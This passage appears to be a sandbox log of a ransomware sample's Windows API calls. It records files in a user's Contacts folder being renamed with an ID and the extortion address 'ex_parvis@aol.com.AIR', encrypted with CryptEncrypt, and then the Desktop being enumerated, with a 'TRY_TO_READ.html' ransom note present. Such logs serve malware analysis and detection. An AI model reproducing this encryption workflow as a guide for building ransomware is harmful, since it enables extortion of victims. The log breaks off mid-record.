lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.12781717671972518758.ex_parvis@aol.com.AIR" [0160.703] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.707] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390 [0160.707] GetProcessHeap () returned 0x2e0000 [0160.707] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0160.707] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1171) returned 1 [0160.707] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x493 [0160.707] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.707] GetProcessHeap () returned 0x2e0000 [0160.707] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.707] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.708] WriteFile (in: hFile=0x390, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.709] WriteFile (in: hFile=0x390, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.709] WriteFile (in: hFile=0x390, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.709] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x493) returned 0x31d01e0 [0160.709] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x493) returned 0x31d0680 [0160.709] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.709] ReadFile (in: hFile=0x390, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x493, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x493, lpOverlapped=0x0) returned 1 [0160.709] SetFilePointer (in: hFile=0x390, lDistanceToMove=-1171, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.709] WriteFile (in: hFile=0x390, lpBuffer=0x31d0680*, nNumberOfBytesToWrite=0x493, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0680*, lpNumberOfBytesWritten=0x2acf9c8*=0x493, lpOverlapped=0x0) returned 1 [0160.709] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d01e0 | out: hHeap=0x2e0000) returned 1 [0160.709] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0680 | out: hHeap=0x2e0000) returned 1 [0160.709] CloseHandle (hObject=0x390) returned 1 [0160.710] GetProcessHeap () returned 0x2e0000 [0160.710] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.710] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.710] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.710] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329018 | out: hHeap=0x2e0000) returned 1 [0160.710] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329128 | out: hHeap=0x2e0000) returned 1 [0160.710] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329128 [0160.710] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.710] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.710] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.710] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.710] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", dwFileAttributes=0x80) returned 1 [0160.710] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 61 [0160.710] GetProcessHeap () returned 0x2e0000 [0160.710] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe0) returned 0x319d30 [0160.710] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" [0160.710] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.12781717671972518758.ex_parvis@aol.com.AIR" [0160.710] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.712] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390 [0160.712] GetProcessHeap () returned 0x2e0000 [0160.712] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0160.712] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=68382) returned 1 [0160.713] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10b1e [0160.713] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.713] GetProcessHeap () returned 0x2e0000 [0160.713] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.713] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.713] WriteFile (in: hFile=0x390, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.714] WriteFile (in: hFile=0x390, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.714] WriteFile (in: hFile=0x390, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.714] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10b1e) returned 0x3a7410 [0160.714] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10b1e) returned 0x3b7f38 [0160.715] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.715] ReadFile (in: hFile=0x390, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x10b1e, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x10b1e, lpOverlapped=0x0) returned 1 [0160.719] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.719] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.719] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", dwFileAttributes=0x80) returned 1 [0160.721] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 63 [0160.721] GetProcessHeap () returned 0x2e0000 [0160.721] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe4) returned 0x3a7428 [0160.721] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" [0160.721] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.12781717671972518758.ex_parvis@aol.com.AIR" [0160.721] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.724] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390 [0160.724] GetProcessHeap () returned 0x2e0000 [0160.724] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0160.724] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1178) returned 1 [0160.724] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x49a [0160.724] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.724] GetProcessHeap () returned 0x2e0000 [0160.724] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.724] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.724] WriteFile (in: hFile=0x390, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.726] WriteFile (in: hFile=0x390, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.726] WriteFile (in: hFile=0x390, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.726] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x49a) returned 0x31d01e0 [0160.726] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x49a) returned 0x31d0688 [0160.726] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.726] ReadFile (in: hFile=0x390, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x49a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x49a, lpOverlapped=0x0) returned 1 [0160.726] SetFilePointer (in: hFile=0x390, lDistanceToMove=-1178, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.726] WriteFile (in: hFile=0x390, lpBuffer=0x31d0688*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0688*, lpNumberOfBytesWritten=0x2acf9c8*=0x49a, lpOverlapped=0x0) returned 1 [0160.726] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d01e0 | out: hHeap=0x2e0000) returned 1 [0160.726] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0688 | out: hHeap=0x2e0000) returned 1 [0160.726] CloseHandle (hObject=0x390) returned 1 [0160.727] GetProcessHeap () returned 0x2e0000 [0160.727] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.727] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.727] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.727] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3291b0 | out: hHeap=0x2e0000) returned 1 [0160.727] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0160.727] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3389c8 [0160.727] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338758 | out: hHeap=0x2e0000) returned 1 [0160.727] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324ca0 | out: hHeap=0x2e0000) returned 1 [0160.727] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e008 | out: hHeap=0x2e0000) returned 1 [0160.727] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978366d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0160.727] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x338758 [0160.727] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3389c8 | out: hHeap=0x2e0000) returned 1 [0160.727] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324cf8 | out: hHeap=0x2e0000) returned 1 [0160.727] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3507c8 | out: hHeap=0x2e0000) returned 1 [0160.727] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e2d8 [0160.727] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.728] GetLastError () returned 0x5 [0160.728] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.728] GetLastError () returned 0x5 [0160.728] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e493dc0, ftCreationTime.dwHighDateTime=0x1d4d4be, ftLastAccessTime.dwLowDateTime=0x22561820, ftLastAccessTime.dwHighDateTime=0x1d4d54e, ftLastWriteTime.dwLowDateTime=0x22561820, ftLastWriteTime.dwHighDateTime=0x1d4d54e, nFileSizeHigh=0x0, nFileSizeLow=0x1128a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1LSF euTPv6HuPHC5.mp3", cAlternateFileName="1LSFEU~1.MP3")) returned 1 [0160.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.728] GetLastError () returned 0x5 [0160.728] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3112b670, ftCreationTime.dwHighDateTime=0x1d4cf45, ftLastAccessTime.dwLowDateTime=0x699a8d10, ftLastAccessTime.dwHighDateTime=0x1d4d314, ftLastWriteTime.dwLowDateTime=0x699a8d10, ftLastWriteTime.dwHighDateTime=0x1d4d314, nFileSizeHigh=0x0, nFileSizeLow=0x495, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="39yFmucDocy S9Nua.rtf", cAlternateFileName="39YFMU~1.RTF")) returned 1 [0160.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.728] GetLastError () returned 0x5 [0160.728] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0738dd0, ftCreationTime.dwHighDateTime=0x1d4d41a, ftLastAccessTime.dwLowDateTime=0xbb0ff9a0, ftLastAccessTime.dwHighDateTime=0x1d4ce32, ftLastWriteTime.dwLowDateTime=0xbb0ff9a0, ftLastWriteTime.dwHighDateTime=0x1d4ce32, nFileSizeHigh=0x0, nFileSizeLow=0x11627, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3hM4FAO95hmZLUgSSV.gif", cAlternateFileName="3HM4FA~1.GIF")) returned 1 [0160.728] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.728] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.729] GetLastError () returned 0x5 [0160.729] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb80a050, ftCreationTime.dwHighDateTime=0x1d4cecf, ftLastAccessTime.dwLowDateTime=0xe2d56bf0, ftLastAccessTime.dwHighDateTime=0x1d4c919, ftLastWriteTime.dwLowDateTime=0xe2d56bf0, ftLastWriteTime.dwHighDateTime=0x1d4c919, nFileSizeHigh=0x0, nFileSizeLow=0x23cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A12aHFjeVeGeS7x7ByFN.png", cAlternateFileName="A12AHF~1.PNG")) returned 1 [0160.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.729] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.729] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.729] GetLastError () returned 0x5 [0160.729] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcda7c300, ftCreationTime.dwHighDateTime=0x1d4d1b0, ftLastAccessTime.dwLowDateTime=0x53888c00, ftLastAccessTime.dwHighDateTime=0x1d4d573, ftLastWriteTime.dwLowDateTime=0x53888c00, ftLastWriteTime.dwHighDateTime=0x1d4d573, nFileSizeHigh=0x0, nFileSizeLow=0x149ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b2yfC0.png", cAlternateFileName="")) returned 1 [0160.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0160.729] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0160.729] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0160.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0160.729] GetLastError () returned 0x5 [0160.729] FindNextFileW (in: hFindFile=0x35e2d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x268adcf0, ftCreationTime.dwHighDateTime=0x1d4d3f5, ftLastAccessTime.dwLowDateTime=0xa00efc50, ftLastAccessTime.dwHighDateTime=0x1d4d26a, ftLastWriteTime.dwLowDateTime=0xa00efc50, ftLastWriteTime.dwHighDateTime=0x1d4d26a, nFileSizeHigh=0x0, nFileSizeLow=0x10926, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bq1hwoT7i-_R.png", cAlternateFileName="BQ1HWO~1.PNG")) returned 1 [0160.729] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: 